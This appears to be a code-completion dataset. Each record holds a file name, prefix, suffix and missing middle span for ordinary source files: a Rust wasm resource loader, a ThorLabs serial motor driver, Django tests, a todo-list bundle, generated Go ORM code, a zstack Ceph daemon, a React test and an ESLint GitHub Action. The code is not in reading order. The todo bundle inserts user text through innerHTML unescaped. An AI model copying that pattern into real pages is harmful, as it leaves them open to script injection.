| python_validate_rrsig |
lib.rs | #[macro_use]
extern crate serde_derive;
mod models;
mod types;
use serde_json;
use serde_json::json;
use serde_json::value::Value;
use types::{DeleteOpts, JsSpec, ResourceSpec};
use wasm_bindgen::prelude::*;
use wasm_bindgen::JsValue;
#[wasm_bindgen]
extern "C" {
#[wasm_bindgen(js_namespace = console)]
fn log(s: &str);
}
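/// Converts a resource spec passed in from JS into a `JsSpec` whose params
/// carry either a create request or delete options for the resource kind.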
#[wasm_bindgen]
pub fn load_resource_to_js(value: &JsValue) -> JsValue | {
let default_cp = String::from("huaweicloud");
let res: ResourceSpec = value.into_serde().expect("failed to load resource spec!");
let k = res.get_kind();
let op = res.get_metadata().get_operation();
let provider = res.get_metadata().get_cloud_provider();
let mut js = JsSpec::new(&res.get_kind(), &op, json!(null));
let json_spec = serde_json::to_string(&res.get_spec()).unwrap();
match k.as_str() {
"ComputeResource" => {
let mut spec: models::ComputeResourceCreateRequest =
serde_json::from_str(&json_spec).unwrap();
// Update cloud provider info of compute resource create request
// from metadata
spec.cloud_provider = provider;
let param: Value = match op.as_str() {
"create" => {
let v: Value =
serde_json::from_str(&serde_json::to_string(&spec).unwrap()).unwrap();
v
}
"delete" => {
let opt = DeleteOpts::new(&spec.name, &default_cp, false, false);
let v: Value =
serde_json::from_str(&serde_json::to_string(&opt).unwrap()).unwrap();
v
}
_ => {
log(&format!("operation {} is not supported!", op));
json!(null)
}
};
js.set_params(param);
}
"StorageResource" => {
let mut spec: models::StorageResourceCreateRequest =
serde_json::from_str(&json_spec).unwrap();
// Update cloud provider info of storage resource create request
// from metadata
spec.cloud_provider = provider;
let param: Value = match op.as_str() {
"create" => {
let v: Value =
serde_json::from_str(&serde_json::to_string(&spec).unwrap()).unwrap();
v
}
"delete" => {
let opt = DeleteOpts::new(&spec.name, &default_cp, false, false);
let v: Value =
serde_json::from_str(&serde_json::to_string(&opt).unwrap()).unwrap();
v
}
_ => {
log(&format!("operation {} is not supported!", op));
json!(null)
}
};
js.set_params(param);
}
"NetworkResource" => {
let mut spec: models::NetworkResourceCreateRequest =
serde_json::from_str(&json_spec).unwrap();
// Update cloud provider info of network resource create request
// from metadata
spec.cloud_provider = provider;
let param: Value = match op.as_str() {
"create" => {
let v: Value =
serde_json::from_str(&serde_json::to_string(&spec).unwrap()).unwrap();
v
}
"delete" => {
let opt = DeleteOpts::new(&spec.name, &default_cp, false, false);
let v: Value =
serde_json::from_str(&serde_json::to_string(&opt).unwrap()).unwrap();
v
}
_ => {
log(&format!("operation {} is not supported!", op));
json!(null)
}
};
js.set_params(param);
}
_ => log(&format!("resource kind {} is not supported!", k)),
};
JsValue::from_serde(&js).unwrap()
} |
|
ThorLabs_controller_rs232_driver.py | #!/bin/env python
"""
ThorLabs TDC001 and KDC001 cubes Low Level code.
This code specifies the communication protocols for T and K cubes.
Valentyn Stadnytskyi
[email protected]
The communication protocols:
https://www.thorlabs.com/Software/Motion%20Control/APT_Communications_Protocol.pdf issue 20
"""
from time import sleep, time
from numpy import zeros, ones, mean, std, sign
from serial import Serial
from struct import pack, unpack
from pdb import pm
import logging
from logging import debug, info, warn, error
class Motor(object):
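"""
Low-level serial (RS-232) driver for ThorLabs TDC001/KDC001 motor
controller cubes speaking the APT communications protocol.
"""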
def __init__(self):
self.baudrate = 115200
self.controller = ''
self.motor = ''
self.last_communication = {}
self.port = None
def init(self, serial_number = '', controller_type = None, motor_type = None):
if controller_type is None:
raise Exception('The controller type is not specified!')
else:
self.controller_type = controller_type
if motor_type is None:
raise Exception('The motor type is not specified!')
else:
self.motor_type = motor_type
if serial_number != "":
port_name = self.get_port(serial_number = serial_number)
ser = self.get_serial_object(port_name = port_name)
if ser is not None:
self.port = ser
self.port.timeout = 0.4
self.serial_number = serial_number
else:
self.port = None
print('No serial device with serial number {}'.format(serial_number))
else:
self.port = None
print('Serial Number has to be specified')
def list_all(self):
"""
lists and returns all com ports with the manufacturer field equal to 'Thorlabs'
"""
import serial.tools.list_ports
lst = serial.tools.list_ports.comports()
available_ports = []
for item in lst:
debug('Manufacturer of this motor is {}'.format(item.manufacturer))
if item.manufacturer == 'Thorlabs':
available_ports.append(item)
return available_ports
def get_port(self, serial_number = None):
"""
returns the name of the serial port for the ThorLabs motor controller with specified serial_number
"""
def is_port_open(port):
from serial import Serial
import platform
if platform.system() == 'Linux':
prefix = '/dev/'
else:
prefix = ''
ser = Serial(prefix+port, baudrate=115200, bytesize = 8, parity='N', stopbits=1, timeout=1)
ser.isOpen()
import platform
if platform.system() == 'Linux':
prefix = '/dev/'
else:
prefix = ''
lst = self.list_all()
port_name = ''
if serial_number != None:
for item in lst:
if item.serial_number == str(serial_number):
port_name = prefix+item.name
return port_name
def get_serial_object(self,port_name):
"connects to a given port name /dev/ttyUSB1 in case of linux"
from serial import Serial
ser = Serial(port_name, baudrate=self.baudrate, bytesize = 8, parity='N', stopbits=1, timeout=1)
return ser
def initialization(self):
"""initialization function"""
#this will turn on message to be send upon completion of the move.
#I ran this command and it turned off reply to identify
#self.port.write(pack('BBBBBB',0x6C,0x04,0x00,0x00,0x80,0x01))
#suspend end of motion message
#self.port.write(pack('BBBBBB',0x6B,0x04,0x00,0x00,0x21,0x01))
"""MGMSG_HW_NO_FLASH_PROGRAMMING"""
#self.port.write()
pass
def read(self, N = 0):
if N ==0:
result = None
else:
result = self.port.read(N)
return result
def write(self,command):
self.flush()
self.port.write(command)
def query_line(self,command, length = None):
"""write read command"""
self.flush()
self.write(command)
while self.port.in_waiting < 1:
sleep(0.1)
result = self.port.readline()
return result
def query(self,command, length = None):
"""write read command"""
self.flush()
self.write(command + b'\r')
if length == None:
result = None
else:
while self.port.in_waiting < length:
sleep(0.1)
result = self.read(N = length)
return result
def close(self):
self.port.close()
del self.port
def waiting(self):
return [self.port.in_waiting,self.port.out_waiting]
def flush(self):
self.port.reset_input_buffer()
self.port.reset_output_buffer()
def blink(self):
"""
submits the blink command to the controller
tested for TDC001 cubes
"""
if self.controller_type == 'T':
self.write(pack('B'*6,0x23,0x02,0x00,0x00,0x50,0x01))
flag = True
else:
flag = False
warn('the controller type is not specified')
def identify(self):
"""
This command is independent of the controller type
page 28-29 of the communication protocol file
send 6 bytes 05 00 00 00 11 01
back 90 bytes
0-5 bytes - header 06 00 54 00 d| s
6-9 bytes - <--Serial Number-->
10-17 bytes- <--Model Number-->
18-19 bytes - <--Type-->
20-23 bytes - <--Firmware Version-->
24-83 bytes - <--For internal use only-->
84-85 bytes - <--HW Version-->
86-87 bytes - <--Mod State-->
88-89 bytes - <--nchs--> "number of channels"
tested for TDC001 cubes
"""
from struct import pack
flag = True
if self.controller_type == 'T':
command = pack('BBBBBB',0x05,0x00,0x00,0x00,0x50,0x01)
else:
flag = False
if flag:
result = self.query_line(command,90)
self.full_result = result
Header = result[0:6]
SerialNumber = unpack('i',result[6:10]) #unpack('L',result[6:10])
ModelNumber = result[10:18]
Type = unpack('h',result[18:20])
FirmwareVersion = self.my_unpack(result,20,23)
HWVersion = result[84:86]
ForInternalUseOnly = result[24:84]
ModState = self.my_unpack(result,86,87)
nchs = self.my_unpack(result,88,89)
msg = ""
debug('The result of identify command: \n Header: {} \n Serial Number: {} \
\n Model Number: {} \n Type: {} \n Firmware Version: {} \n Mod State: {} \
\n nchs: {} \n For Internal Use Only: \
\n {}'.format(Header, SerialNumber,ModelNumber,Type,FirmwareVersion, ModState,nchs,ForInternalUseOnly))
res_dic = {}
res_dic['Header'] = Header
res_dic['SerialNumber'] = SerialNumber
res_dic['ModelNumber'] = ModelNumber
res_dic['Type'] = Type
res_dic['FirmwareVersion'] = FirmwareVersion
res_dic['HWVersion'] = HWVersion
res_dic['ForInternalUseOnly'] = ForInternalUseOnly
res_dic['ModState'] = ModState
res_dic['nchs'] = nchs
else:
res_dic = {}
res_dic['Header'] = None
res_dic['SerialNumber'] = None
res_dic['ModelNumber'] = None
res_dic['Type'] = None
res_dic['FirmwareVersion'] = None
res_dic['HWVersion'] = None
res_dic['ForInternalUseOnly'] = None
res_dic['ModState'] = None
res_dic['nchs'] = None
return res_dic
def move_abs(self,new_pos):
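"""
moves the stage to the absolute position <new_pos> in encoder counts
(MGMSG_MOT_MOVE_ABSOLUTE) and reads back the 20-byte completion message.
"""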
flag = False
comment = None
if self.controller_type == 'T':
c_header = pack('BBBBBB',0x53,0x04,0x06,0x00,0x80,0x01)
c_channel = pack('BB',0x01,0x00)
c_distance = pack('i',new_pos)
command = c_header + c_channel + c_distance
response = self.query_line(command,20)
res_pos = unpack('i',response[8:12])
res_enc = unpack('i',response[12:16])
res_status_bits = response[16:20]
flag = True
return flag, comment
def move_relative(self,delta_pos):
"""
move relative
+delta_pos will move positive by that number
-delta_pos will move negative by that number
tested for TDC001 cube.
"""
flag = False
comment = None
if self.controller_type == 'T':
c_header = pack('B'*6,0x48, 0x04, 0x06, 0x00, 0xA2, 0x01)
c_channel = pack('BB',0x01,0x00)
c_distance = pack('i',delta_pos)
command = c_header + c_channel + c_distance
#print('command sent %r' % command)
response = self.query_line(command,20)
res_pos = unpack('i',response[8:12])
res_enc = unpack('i',response[12:16])
res_status_bits = response[16:20]
debug('res_pos:{} , res_enc:{}, res_status_bits:{}'.format(res_pos,res_enc,res_status_bits))
flag = True
comment = '' + str(response)
else:
warn('unknown controller type')
reply = {}
reply['flag'] = flag
reply['comment'] = comment
return reply
def get_position(self):
"""FIXIT: add description"""
if self.controller_type == 'T':
command = pack('BBBBBB',0x11,0x04,0x01,0x00,0x21,0x01)
#print('Get position command sent %r' % command)
response = self.query(command,12)
res_header = response[0:6]
res_chan_ident = response[6:8]
res_encoder_counts = response[8:12]
self.last_communication['command'] = command
self.last_communication['response'] = response
return unpack('i',res_encoder_counts)[0]
else:
return None
def set_position(self,value):
"""
"""
c_header = pack('BBBBBB',0x09,0x04,0x06,0x00,0xA2,0x01)
c_channel = pack('BB',0x01,0x00)
c_distance = pack('i',value)
command = c_header + c_channel + c_distance
self.write(command)
def home(self):
'''MGMSG_MOT_MOVE_HOME'''
flag = False
if self.controller_type == 'T':
self.write(pack('B'*6,0x43,0x04,0x00,0x00,0xA2,0x01))
while self.port.in_waiting == 0:
sleep(0.1)
res = self.read(6)
if res == pack('BBBBBB',0x44,0x04,0x01,0x00,0x01,0x80):
print('%r' % res)
flag = True
else:
|
return flag, res #returns True of home was succesfully executed.
def my_unpack(self,var,f,t):
return unpack('B'*len(var[f:t+1]),var[f:t+1])
def hex_to_chr(self, var):
string = ''
for i in var:
string += chr(i)
return string
"""Potentially useful commands. Haven;t been used or extensively tested"""
def set_position_2(self,value):
c_header = pack('BBBBBB',0x10,0x04,0x06,0x00,0xA2,0x01)
c_channel = pack('BB',0x01,0x00)
Pos = self.get_position()
c_distance = pack('i',value)
command = c_header + c_channel + c_distance
response = self.query(command)
return response
def home_parameters_set(self,home_dir,limit_switch,home_velocity,offset_distance):
""" MGMSG_MOT_SET_HOMEPARAMS 0x0440 """
if self.motor_type == 'A':
raise ValueError('This is AutoOptics motor and it does not have homing option!')
else:
c_header = pack('B'*6,0x40,0x04,0x0E,0x00,0xA2,0x01)
c_channel = pack('BB',0x01,0x00) #<---this is always the same for TDC001 cubes.
c_home_dir = pack('h',home_dir)
c_limit_switch = pack('h',limit_switch)
c_home_velocity = pack('l',home_velocity)
c_offset_distance = pack('l',offset_distance)
command = c_header + c_channel + c_home_dir + c_limit_switch + c_home_velocity + c_offset_distance
response = self.query(command)
def home_parameters_get(self):
""" MGMSG_MOT_GET_HOMEPARAMS 0x0442 """
from struct import unpack
command = pack('B'*6,0x41,0x04,0x01,0x00,0x64,0x73)
response = self.query(command,20)
res = {}
res['header'] = response[0:7]
res['chan_ident'] = unpack('h',response[6:8])
res['home_dir']= unpack('h',response[8:10])
res['limit_switch'] = unpack('b',response[10:11])
res['home_velocity'] = unpack('i',response[12:16])
res['offset_distance'] = unpack('i',response[16:20])
return res
def run_test1(self,N):
from random import random
from time import sleep, time
lst = []
to = []
for i in range(N):
start = time()
prev = self.get_position()
goto = int(random()*25*512.*67.)
self.move_abs(goto)
while abs(goto - self.get_position()) > 3:
sleep(0.3)
arrived = self.get_position()
print([time()-start, round(goto/(512.*67.),2), round(arrived/(512.*67.),2), round((goto-prev)/(512.*67.*(time()-start)),2)])
sleep(5)
if __name__ == "__main__":
from tempfile import gettempdir
import logging
logging.basicConfig(#filename=gettempdir()+'/syringe_pump_DL.log',
level=logging.INFO, format="%(asctime)s %(levelname)s: %(message)s")
print('This is a Low Level python script providing Device Level with basic communication commands')
motors = []
motors.append(Motor())
#motors.append(Motor())
#motors.append(Motor())
#motors[0].init('27254090')
#motors[1].init('27254025')
motors[0].init('83825160', controller_type = 'T', motor_type = 'T')
for motor in motors:
motor.blink()
for motor in motors:
reply = motor.identify()
print(reply)
#for motor in motors: motor.close()
#print('all ports are closed')
| print(res) |
test_management_commands.py | from io import StringIO
from django.core.management import call_command
from django.test import TestCase
class InventoryManagementCommandsTest(TestCase):
def | (self):
out = StringIO()
call_command('cleanup_inventory_history', stdout=out)
result = out.getvalue()
self.assertIn('min date', result)
self.assertIn('machine_snapshot_commit', result)
def test_cleanup_inventory_history_quiet(self):
out = StringIO()
call_command('cleanup_inventory_history', '-q', stdout=out)
self.assertEqual("", out.getvalue())
| test_cleanup_inventory_history |
bundle.js | /******/ (() => { // webpackBootstrap
var __webpack_exports__ = {};
function _toConsumableArray(arr) { return _arrayWithoutHoles(arr) || _iterableToArray(arr) || _unsupportedIterableToArray(arr) || _nonIterableSpread(); }
function _nonIterableSpread() { throw new TypeError("Invalid attempt to spread non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method."); }
function _unsupportedIterableToArray(o, minLen) { if (!o) return; if (typeof o === "string") return _arrayLikeToArray(o, minLen); var n = Object.prototype.toString.call(o).slice(8, -1); if (n === "Object" && o.constructor) n = o.constructor.name; if (n === "Map" || n === "Set") return Array.from(o); if (n === "Arguments" || /^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)) return _arrayLikeToArray(o, minLen); }
function _iterableToArray(iter) { if (typeof Symbol !== "undefined" && iter[Symbol.iterator] != null || iter["@@iterator"] != null) return Array.from(iter); }
function _arrayWithoutHoles(arr) { if (Array.isArray(arr)) return _arrayLikeToArray(arr); }
function _arrayLikeToArray(arr, len) { if (len == null || len > arr.length) len = arr.length; for (var i = 0, arr2 = new Array(len); i < len; i++) { arr2[i] = arr[i]; } return arr2; }
var todoList = function todoList() {
var addBtn = document.getElementById('addBtn');
var inputTodo = document.getElementById('inputTodo');
var clearBtn = document.getElementById('clearBtn');
var ulTodo = document.getElementById('todoList');
var listBox = document.getElementById('app');
addBtn.addEventListener('click', function (e) {
return clickAddBtn(e);
});
clearBtn.addEventListener('click', function () {
return clearTodoList();
});
ulTodo.addEventListener('click', function (e) {
return clickTodoBtn(e);
}); // Load & save localStorage
var getLocalStorage = function getLocalStorage() {
return JSON.parse(localStorage.getItem('todo')) || [];
};
var setLocalStorage = function setLocalStorage(list) {
return localStorage.setItem('todo', JSON.stringify(list));
}; // Click event: add a new todo
var clickAddBtn = function clickAddBtn(e) {
e.preventDefault();
if (inputTodo.value !== '') addTodo();
}; // Add a todo item
var addTodo = function addTodo() {
var newTodo = {
text: inputTodo.value,
checked: false
};
var newArr = [].concat(_toConsumableArray(getLocalStorage()), [newTodo]);
inputTodo.value = '';
showTodoList(newArr);
}; // Save to localStorage & render the list
var showTodoList = function showTodoList(list) {
setLocalStorage(list);
renderTodoList(list);
sectionInactive(list);
}; // Render the todo list
var renderTodoList = function renderTodoList(list) {
ulTodo.innerHTML = list.map(function (todo, i) {
return "<li class=\"todo ".concat(todo.checked === true ? 'checked' : '', "\" data-num=\"").concat(i, "\">\n <button id=\"checkBtn\"><i class=\"fa-solid fa-check\"></i></button>\n <span>").concat(todo.text, "</span>\n <button id=\"deleteBtn\"><i class=\"fa-solid fa-xmark\"></i></button\n </li>");
}).join('');
}; // Hide the section (display: none) when the list is empty
var sectionInactive = function sectionInactive(list) {
return list.length === 0 ? listBox.classList.add('inactive') : listBox.classList.remove('inactive');
}; // Initial render on page load
var init = function init() {
return showTodoList(getLocalStorage());
};
init(); // Click event: check or delete the clicked todo
var clickTodoBtn = function clickTodoBtn(e) {
if (e.target.id === 'checkBtn') checkTodo(e);
if (e.target.id === 'deleteBtn') deleteTodo(e);
}; // Delete the clicked todo
var deleteTodo = function deleteTodo(e) {
var deleteNum = e.target.closest('li').dataset.num;
var newArr = getLocalStorage().filter(function (todo, i) {
return i !== Number(deleteNum);
});
showTodoList(newArr);
}; // Toggle the check mark on the clicked todo
| var checkNum = e.target.closest('li').dataset.num;
var savedArr = getLocalStorage();
var newArr = _toConsumableArray(savedArr);
newArr[checkNum].checked = !savedArr[checkNum].checked;
showTodoList(newArr);
}; // Click event: clear the entire todo list
var clearTodoList = function clearTodoList() {
return showTodoList([]);
};
};
window.addEventListener('DOMContentLoaded', function () {
return todoList();
});
/******/ })()
; | var checkTodo = function checkTodo(e) { |
pms_product_category_attribute_relation_model.go | // ==========================================================================
// This is auto-generated by gf cli tool. You may not really want to edit it.
// ==========================================================================
package pms_product_category_attribute_relation
import (
"database/sql"
"github.com/gogf/gf/database/gdb"
"github.com/gogf/gf/frame/g"
"github.com/gogf/gf/frame/gmvc"
"time"
)
// arModel is an active record design model for table pms_product_category_attribute_relation operations.
type arModel struct {
gmvc.M
}
var (
// Table is the table name of pms_product_category_attribute_relation.
Table = "pms_product_category_attribute_relation"
// Model is the model object of pms_product_category_attribute_relation.
Model = &arModel{g.DB("default").Table(Table).Safe()}
// Columns defines and stores column names for table pms_product_category_attribute_relation.
Columns = struct {
Id string //
ProductCategoryId string //
ProductAttributeId string //
}{
Id: "id",
ProductCategoryId: "product_category_id",
ProductAttributeId: "product_attribute_id",
}
)
// FindOne is a convenience method for Model.FindOne.
// See Model.FindOne.
func FindOne(where ...interface{}) (*Entity, error) {
return Model.FindOne(where...)
}
// FindAll is a convenience method for Model.FindAll.
// See Model.FindAll.
func FindAll(where ...interface{}) ([]*Entity, error) {
return Model.FindAll(where...)
}
// FindValue is a convenience method for Model.FindValue.
// See Model.FindValue.
func FindValue(fieldsAndWhere ...interface{}) (gdb.Value, error) {
return Model.FindValue(fieldsAndWhere...)
}
// FindArray is a convenience method for Model.FindArray.
// See Model.FindArray.
func FindArray(fieldsAndWhere ...interface{}) ([]gdb.Value, error) {
return Model.FindArray(fieldsAndWhere...)
}
// FindCount is a convenience method for Model.FindCount.
// See Model.FindCount.
func | (where ...interface{}) (int, error) {
return Model.FindCount(where...)
}
// Insert is a convenience method for Model.Insert.
func Insert(data ...interface{}) (result sql.Result, err error) {
return Model.Insert(data...)
}
// InsertIgnore is a convenience method for Model.InsertIgnore.
func InsertIgnore(data ...interface{}) (result sql.Result, err error) {
return Model.InsertIgnore(data...)
}
// Replace is a convenience method for Model.Replace.
func Replace(data ...interface{}) (result sql.Result, err error) {
return Model.Replace(data...)
}
// Save is a convenience method for Model.Save.
func Save(data ...interface{}) (result sql.Result, err error) {
return Model.Save(data...)
}
// Update is a convenience method for Model.Update.
func Update(dataAndWhere ...interface{}) (result sql.Result, err error) {
return Model.Update(dataAndWhere...)
}
// Delete is a convenience method for Model.Delete.
func Delete(where ...interface{}) (result sql.Result, err error) {
return Model.Delete(where...)
}
// As sets an alias name for current table.
func (m *arModel) As(as string) *arModel {
return &arModel{m.M.As(as)}
}
// TX sets the transaction for current operation.
func (m *arModel) TX(tx *gdb.TX) *arModel {
return &arModel{m.M.TX(tx)}
}
// Master marks the following operation on master node.
func (m *arModel) Master() *arModel {
return &arModel{m.M.Master()}
}
// Slave marks the following operation on slave node.
// Note that it makes sense only if there's any slave node configured.
func (m *arModel) Slave() *arModel {
return &arModel{m.M.Slave()}
}
// LeftJoin does "LEFT JOIN ... ON ..." statement on the model.
func (m *arModel) LeftJoin(joinTable string, on string) *arModel {
return &arModel{m.M.LeftJoin(joinTable, on)}
}
// RightJoin does "RIGHT JOIN ... ON ..." statement on the model.
func (m *arModel) RightJoin(joinTable string, on string) *arModel {
return &arModel{m.M.RightJoin(joinTable, on)}
}
// InnerJoin does "INNER JOIN ... ON ..." statement on the model.
func (m *arModel) InnerJoin(joinTable string, on string) *arModel {
return &arModel{m.M.InnerJoin(joinTable, on)}
}
// Fields sets the operation fields of the model, multiple fields joined using char ','.
func (m *arModel) Fields(fields string) *arModel {
return &arModel{m.M.Fields(fields)}
}
// FieldsEx sets the excluded operation fields of the model, multiple fields joined using char ','.
func (m *arModel) FieldsEx(fields string) *arModel {
return &arModel{m.M.FieldsEx(fields)}
}
// Option sets the extra operation option for the model.
func (m *arModel) Option(option int) *arModel {
return &arModel{m.M.Option(option)}
}
// OmitEmpty sets OPTION_OMITEMPTY option for the model, which automatically filters
// the data and where attributes for empty values.
func (m *arModel) OmitEmpty() *arModel {
return &arModel{m.M.OmitEmpty()}
}
// Filter marks filtering the fields which does not exist in the fields of the operated table.
func (m *arModel) Filter() *arModel {
return &arModel{m.M.Filter()}
}
// Where sets the condition statement for the model. The parameter <where> can be type of
// string/map/gmap/slice/struct/*struct, etc. Note that, if it's called more than one times,
// multiple conditions will be joined into where statement using "AND".
// Eg:
// Where("uid=10000")
// Where("uid", 10000)
// Where("money>? AND name like ?", 99999, "vip_%")
// Where("uid", 1).Where("name", "john")
// Where("status IN (?)", g.Slice{1,2,3})
// Where("age IN(?,?)", 18, 50)
// Where(User{ Id : 1, UserName : "john"})
func (m *arModel) Where(where interface{}, args ...interface{}) *arModel {
return &arModel{m.M.Where(where, args...)}
}
// And adds "AND" condition to the where statement.
func (m *arModel) And(where interface{}, args ...interface{}) *arModel {
return &arModel{m.M.And(where, args...)}
}
// Or adds "OR" condition to the where statement.
func (m *arModel) Or(where interface{}, args ...interface{}) *arModel {
return &arModel{m.M.Or(where, args...)}
}
// Group sets the "GROUP BY" statement for the model.
func (m *arModel) Group(groupBy string) *arModel {
return &arModel{m.M.Group(groupBy)}
}
// Order sets the "ORDER BY" statement for the model.
func (m *arModel) Order(orderBy string) *arModel {
return &arModel{m.M.Order(orderBy)}
}
// Limit sets the "LIMIT" statement for the model.
// The parameter <limit> can be either one or two numbers: if two numbers are passed,
// it sets the "LIMIT limit[0],limit[1]" statement for the model, or else it sets the
// "LIMIT limit[0]" statement.
func (m *arModel) Limit(limit ...int) *arModel {
return &arModel{m.M.Limit(limit...)}
}
// Offset sets the "OFFSET" statement for the model.
// It only makes sense for some databases like SQLServer, PostgreSQL, etc.
func (m *arModel) Offset(offset int) *arModel {
return &arModel{m.M.Offset(offset)}
}
// Page sets the paging number for the model.
// The parameter <page> starts from 1 for paging.
// Note that this differs from the Limit function, which starts from 0 for the "LIMIT" statement.
func (m *arModel) Page(page, limit int) *arModel {
return &arModel{m.M.Page(page, limit)}
}
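// Illustrative comparison (a sketch): Page counts from 1 while Limit counts from 0,
// so with a page size of 10 the following are equivalent:
//   m.Page(2, 10)   // -> LIMIT 10,10
//   m.Limit(10, 10) // -> LIMIT 10,10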
// Batch sets the batch operation number for the model.
func (m *arModel) Batch(batch int) *arModel {
return &arModel{m.M.Batch(batch)}
}
// Cache sets the cache feature for the model. It caches the result of the sql, which means
// if another identical sql request comes in, it just reads and returns the result from cache
// instead of committing and executing it against the database.
//
// If the parameter <duration> < 0, it clears the cache with the given <name>.
// If the parameter <duration> = 0, the cache never expires.
// If the parameter <duration> > 0, the cache expires after <duration>.
//
// The optional parameter <name> is used to bind a name to the cache, which means you can later
// control the cache like changing the <duration> or clearing the cache with specified <name>.
//
// Note that, the cache feature is disabled if the model is operating on a transaction.
func (m *arModel) Cache(duration time.Duration, name ...string) *arModel {
return &arModel{m.M.Cache(duration, name...)}
}
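// Illustrative usage (a sketch; the cache name "vip-user" is an assumed example):
//   m.Cache(time.Hour, "vip-user") // cache the result for one hour under "vip-user"
//   m.Cache(-1, "vip-user")        // clear the cache entry named "vip-user"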
// Data sets the operation data for the model.
// The parameter <data> can be type of string/map/gmap/slice/struct/*struct, etc.
// Eg:
// Data("uid=10000")
// Data("uid", 10000)
// Data(g.Map{"uid": 10000, "name":"john"})
// Data(g.Slice{g.Map{"uid": 10000, "name":"john"}, g.Map{"uid": 20000, "name":"smith"})
func (m *arModel) Data(data ...interface{}) *arModel {
return &arModel{m.M.Data(data...)}
}
// All does "SELECT FROM ..." statement for the model.
// It retrieves the records from table and returns the result as []*Entity.
// It returns nil if there's no record retrieved with the given conditions from table.
//
// The optional parameter <where> is the same as the parameter of Model.Where function,
// see Model.Where.
func (m *arModel) All(where ...interface{}) ([]*Entity, error) {
all, err := m.M.All(where...)
if err != nil {
return nil, err
}
var entities []*Entity
if err = all.Structs(&entities); err != nil && err != sql.ErrNoRows {
return nil, err
}
return entities, nil
}
// One retrieves one record from table and returns the result as *Entity.
// It returns nil if there's no record retrieved with the given conditions from table.
//
// The optional parameter <where> is the same as the parameter of Model.Where function,
// see Model.Where.
func (m *arModel) One(where ...interface{}) (*Entity, error) {
one, err := m.M.One(where...)
if err != nil {
return nil, err
}
var entity *Entity
if err = one.Struct(&entity); err != nil && err != sql.ErrNoRows {
return nil, err
}
return entity, nil
}
// FindOne retrieves and returns a single Record by Model.WherePri and Model.One.
// Also see Model.WherePri and Model.One.
func (m *arModel) FindOne(where ...interface{}) (*Entity, error) {
one, err := m.M.FindOne(where...)
if err != nil {
return nil, err
}
var entity *Entity
if err = one.Struct(&entity); err != nil && err != sql.ErrNoRows {
return nil, err
}
return entity, nil
}
// FindAll retrieves and returns Result by Model.WherePri and Model.All.
// Also see Model.WherePri and Model.All.
func (m *arModel) FindAll(where ...interface{}) ([]*Entity, error) {
all, err := m.M.FindAll(where...)
if err != nil {
return nil, err
}
var entities []*Entity
if err = all.Structs(&entities); err != nil && err != sql.ErrNoRows {
return nil, err
}
return entities, nil
}
// Chunk iterates the table with given size and callback function.
func (m *arModel) Chunk(limit int, callback func(entities []*Entity, err error) bool) {
m.M.Chunk(limit, func(result gdb.Result, err error) bool {
var entities []*Entity
err = result.Structs(&entities)
if err == sql.ErrNoRows {
return false
}
return callback(entities, err)
})
}
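// Illustrative usage (a sketch): iterate the table 100 records at a time;
// returning false from the callback stops the iteration early.
//   m.Chunk(100, func(entities []*Entity, err error) bool {
//       // handle entities ...
//       return true
//   })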
// LockUpdate sets the lock for update for current operation.
func (m *arModel) LockUpdate() *arModel {
return &arModel{m.M.LockUpdate()}
}
// LockShared sets the lock in share mode for current operation.
func (m *arModel) LockShared() *arModel {
return &arModel{m.M.LockShared()}
} | FindCount |
cdaemon.py | '''
@author: frank
'''
import sys, os, os.path
from zstacklib.utils import log
from zstacklib.utils import linux
import zstacklib.utils.iptables as iptables
pidfile = '/var/run/zstack/ceph-primarystorage.pid'
log.configure_log('/var/log/zstack/ceph-primarystorage.log')
logger = log.get_logger(__name__)
import cephagent
def prepare_pid_dir(path):
pdir = os.path.dirname(path)
if not os.path.isdir(pdir):
os.makedirs(pdir)
def main():
usage = 'usage: python -c "from cephprimarystorage import cdaemon; cdaemon.main()" start|stop|restart'
if len(sys.argv) != 2 or not sys.argv[1] in ['start', 'stop', 'restart']:
print usage
sys.exit(1)
global pidfile
prepare_pid_dir(pidfile)
try:
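# Open the agent's listen port (7762) in the firewall before handling the command.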
iptc = iptables.from_iptables_save()
iptc.add_rule('-A INPUT -p tcp -m tcp --dport 7762 -j ACCEPT')
iptc.iptable_restore()
cmd = sys.argv[1]
agentdaemon = cephagent.CephDaemon(pidfile)
if cmd == 'start':
logger.debug('zstack-ceph-primarystorage starts')
agentdaemon.start()
elif cmd == 'stop': | elif cmd == 'restart':
logger.debug('zstack-ceph-primarystorage restarts')
agentdaemon.restart()
sys.exit(0)
except Exception:
logger.warning(linux.get_exception_stacktrace())
sys.exit(1)
if __name__ == '__main__':
main() | logger.debug('zstack-ceph-primarystorage stops')
agentdaemon.stop() |
noOp.spec.tsx | import * as React from "react";
import { assert } from "chai";
import { shallow } from "enzyme";
import assemble from "./assemble";
import noOp from "./noOp";
import Component from "../test/component";
describe("noOp", () => { | c: 3,
};
const composable = noOp;
const Assembly = assemble(composable)(Component);
const wrapper = shallow(<Assembly {...inOut} />);
assert.deepEqual(wrapper.props(), inOut);
});
}); | it("should not alter Component", () => {
const inOut = {
a: 1,
b: 2, |
index.js | #!/usr/bin/env node
/* eslint-disable no-console */
/* eslint-disable camelcase */ // github API convention
/* eslint-env node */
const exitWithError = err => {
console.error('Error', err.stack);
if (err.data) {
console.error(err.data);
}
process.exit(1);
},
{
GITHUB_SHA, GITHUB_EVENT_PATH, GITHUB_TOKEN, GITHUB_WORKSPACE
} = process.env;
if (GITHUB_TOKEN == null) {
exitWithError(new Error('Missing Github token'));
}
if (GITHUB_EVENT_PATH == null) {
exitWithError(new Error('Can not find GITHUB_EVENT_PATH - is this run in Github Actions?'));
}
const https = require('https'),
request = (url, options) =>
new Promise((resolve, reject) => {
const req = https
.request(url, options, res => {
let data = '';
res.on('data', chunk => {
data += chunk;
});
res.on('end', () => {
if (res.statusCode >= 400) {
const err = new Error(`Received status code ${ res.statusCode }`);
err.response = res;
err.data = data;
reject(err);
} else {
resolve({
res,
data: JSON.parse(data)
});
}
});
})
.on('error', reject);
if (options.body) {
req.end(JSON.stringify(options.body));
} else {
req.end();
}
}),
event = require(GITHUB_EVENT_PATH),
{
repository: {
name: repo,
owner: {
login: owner
}
}
} = event,
checkName = 'ESLint check';
let checkSha = GITHUB_SHA;
if (event.pull_request) {
checkSha = event.pull_request.head.sha;
}
const headers = {
'Content-Type': 'application/json',
Accept: 'application/vnd.github.antiope-preview+json',
Authorization: `Bearer ${ GITHUB_TOKEN }`,
'User-Agent': 'eslint-action'
},
createCheck = async () => {
